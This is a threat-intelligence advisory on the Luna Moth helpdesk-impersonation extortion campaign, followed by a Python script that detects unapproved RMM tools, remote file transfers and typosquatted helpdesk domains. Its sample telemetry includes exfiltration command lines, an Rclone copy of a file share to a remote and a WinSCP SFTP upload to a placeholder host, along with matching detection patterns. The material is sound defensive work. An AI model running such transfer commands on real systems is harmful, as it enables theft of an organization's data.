Luna Moth Extortion Hackers Pose as IT Help Desks to Breach US Firms

Summary:
The Luna Moth threat group, also known as Silent Ransom Group, has significantly escalated its data-theft extortion campaigns, particularly targeting legal and financial institutions in the United States. First observed in 2022 following the dissolution of the Conti ransomware syndicate, Luna Moth evolved from BazarCall operators, threat actors previously responsible for delivering Ryuk and Conti ransomware via phone-based phishing. Unlike traditional ransomware campaigns, Luna Moth’s operations rely entirely on social engineering and deception, with no malware payloads or encryption observed in recent attacks.

In their latest campaigns, beginning around March 2025, Luna Moth sends carefully crafted phishing emails that impersonate IT helpdesk notifications from the victim’s organization. These emails instruct recipients to call a fake support number to resolve fabricated issues. Once a target calls the number, they are connected with a Luna Moth operator posing as an IT support technician. The operator then persuades the victim to visit a fake IT support website, hosted on a typosquatted domain registered to mimic a legitimate firm, and to install remote monitoring and management (RMM) software from it.

The attackers abuse legitimate, digitally signed RMM software, including Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop. These tools, commonly used in corporate environments, often bypass endpoint security controls due to their trusted status. Once installed, they provide the attacker with full keyboard access to the victim's device. The adversary uses this access to explore local files, network shares, and connected devices in search of sensitive corporate data.

Security Officer Comments:
After identifying and collecting valuable files, the attackers exfiltrate the data using secure file transfer tools like WinSCP over SFTP or cloud synchronization tools like Rclone. The stolen data is then used for extortion. Victims are contacted and threatened with public disclosure of the information via Luna Moth’s clearweb extortion site unless a ransom is paid. Reported ransom demands range from one to eight million USD, depending on the sensitivity and volume of the stolen data. EclecticIQ researchers have identified at least 37 domains associated with this campaign, many registered through GoDaddy and designed to spoof major U.S. law firms and financial organizations. The campaign’s stealth is notable. It avoids traditional indicators such as malware-laden attachments or exploitative links. Instead, the attacker manipulates the victim into initiating the compromise themselves, a technique that complicates detection and response.

Suggested Corrections:
Defending against Luna Moth requires a shift from malware-focused models to behavioral monitoring, user education, and tightened control over RMM tools. Recommended countermeasures include:
  • Restrict RMM Software
    • Block or restrict installations of Zoho Assist, AnyDesk and other RMM tools unless explicitly approved.
  • Monitor Endpoint Behavior
    • Track the use of RMM tools and file transfer utilities (e.g., WinSCP or Rclone) for suspicious parameters and execution patterns.
  • Detect Spoofed Domains
    • Deploy email rules to flag messages from impersonated helpdesk domains (e.g., [org]-helpdesk[.]com).
  • Educate Employees
    • Deliver regular training focused on detecting social engineering, spotting spoofed invoices, and verifying suspicious support requests.
  • Leverage Threat Intelligence
    • Block known Luna Moth infrastructure using threat intelligence—especially lure domains and exfiltration servers.
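To make the monitoring and email-rule recommendations above concrete, here is an added example in Python; it is not code from the advisory, BleepingComputer or EclecticIQ. It applies three of the suggested checks to constructed telemetry: flagging RMM products outside an approved set, flagging WinSCP or Rclone invocations whose arguments push data to a remote endpoint, and flagging sender domains that either combine the organization's name with a helpdesk token (the [org]-helpdesk[.]com pattern) or sit within two edits of a legitimate domain. The record field names, the tool-name substrings, the approved-RMM set, the sample organization "acmelegal", the sender addresses and the process records are all assumptions made for the demo.

```python
"""Detection helpers for the Luna Moth tradecraft described above.

Added example; it is not code from the advisory, BleepingComputer or
EclecticIQ. It runs over constructed process-creation records and sender
addresses. The record field names ("image", "command_line"), the
tool-name substrings, the sanctioned-RMM set and the sample organisation
"acmelegal" are assumptions made for the demo.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# RMM products named in the advisory, matched as substrings of the lower-cased
# process image name (heuristic; tune to the binary names in your telemetry).
RMM_KEYWORDS = ("syncro", "superops", "zoho", "atera", "anydesk", "splashtop")
# Assumption: the single RMM product this organisation has explicitly approved.
APPROVED_RMM = {"atera"}
# File-transfer utilities the advisory names as exfiltration tooling.
TRANSFER_TOOLS = ("winscp", "rclone")
# Arguments that push data to a remote endpoint: WinSCP "open sftp://" / "put",
# rclone copy|sync|move <source> <remote>:<path>.
EXFIL_ARGS = re.compile(r"sftp://|\bput\b|\b(?:copy|sync|move)\s+\S+\s+\S+:", re.I)
# Tokens the lure domains combine with the victim's name ([org]-helpdesk[.]com).
HELPDESK_TOKENS = ("helpdesk", "help-desk", "support", "itdesk", "servicedesk")


@dataclass(frozen=True)
class Alert:
    rule: str
    subject: str
    detail: str


def analyze_process(event: Dict[str, str]) -> List[Alert]:
    """Apply the RMM and remote-transfer rules to one process-creation record."""
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    cmdline = event.get("command_line", "")
    alerts: List[Alert] = []
    for tool in RMM_KEYWORDS:
        if tool in image and tool not in APPROVED_RMM:
            alerts.append(Alert("unapproved-rmm", image, f"{tool} is not an approved RMM product"))
            break
    if any(tool in image for tool in TRANSFER_TOOLS) and EXFIL_ARGS.search(cmdline):
        alerts.append(Alert("remote-transfer", image, cmdline))
    return alerts


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot near-miss (typosquatted) domain labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def spoofed_helpdesk_sender(sender: str, org_name: str, org_domains: Set[str]) -> Optional[str]:
    """Return why a sender domain looks like an impersonated helpdesk, or None if it is clean.

    Only the last two labels are compared (assumption: no multi-part TLDs such as co.uk).
    """
    domain = sender.rsplit("@", 1)[-1].lower().rstrip(">")
    registrable = ".".join(domain.split(".")[-2:])
    if registrable in org_domains:
        return None
    label = registrable.split(".")[0]
    if org_name in label and any(tok in label for tok in HELPDESK_TOKENS):
        return f"{registrable} combines the organisation name with a helpdesk token"
    if any(levenshtein(label, legit.split(".")[0]) <= 2 for legit in org_domains):
        return f"{registrable} is within two edits of a legitimate domain"
    return None


# Constructed telemetry; paths, the host 203.0.113.7 and share names are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "command_line": "AnyDesk.exe"},
    {"image": r"C:\Program Files\Atera\AteraAgent.exe", "command_line": "AteraAgent.exe"},
    {"image": r"C:\Users\jdoe\AppData\Local\rclone\rclone.exe",
     "command_line": r"rclone.exe copy \\fileserver\Legal remote:cases --transfers 16"},
    {"image": r"C:\Program Files\WinSCP\WinSCP.com",
     "command_line": 'WinSCP.com /command "open sftp://u@203.0.113.7" "put C:\\Docs\\*"'},
    {"image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe memo.txt"},
]
# Constructed sender addresses for the sample organisation.
ORG_NAME, ORG_DOMAINS = "acmelegal", {"acmelegal.com"}
SAMPLE_SENDERS = [
    "IT Support <support@acmelegal-helpdesk.com>",
    "helpdesk@acme-legal.com",
    "helpdesk@acmelegal.com",
    "billing@vendorco.com",
]


def triage() -> Dict[str, List[str]]:
    """Run both rule sets over the samples and return findings keyed by rule name."""
    findings: Dict[str, List[str]] = {}
    for event in SAMPLE_EVENTS:
        for alert in analyze_process(event):
            findings.setdefault(alert.rule, []).append(alert.subject)
    for sender in SAMPLE_SENDERS:
        reason = spoofed_helpdesk_sender(sender, ORG_NAME, ORG_DOMAINS)
        if reason:
            findings.setdefault("spoofed-helpdesk", []).append(reason)
    return findings


if __name__ == "__main__":
    for rule, hits in triage().items():
        print(rule)
        for hit in hits:
            print("   ", hit)
```

Running the script flags the unapproved AnyDesk launch, the Rclone copy to a remote and the WinSCP SFTP session, and two of the four senders; the sanctioned Atera agent, the editor launch and the genuine acmelegal.com helpdesk address produce nothing. In production the substring and edit-distance heuristics should be fed from an inventory of sanctioned tools and the organization's registered domains rather than the constants used here.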
Link(s):
https://www.bleepingcomputer.com/ne...ers-pose-as-it-help-desks-to-breach-us-firms/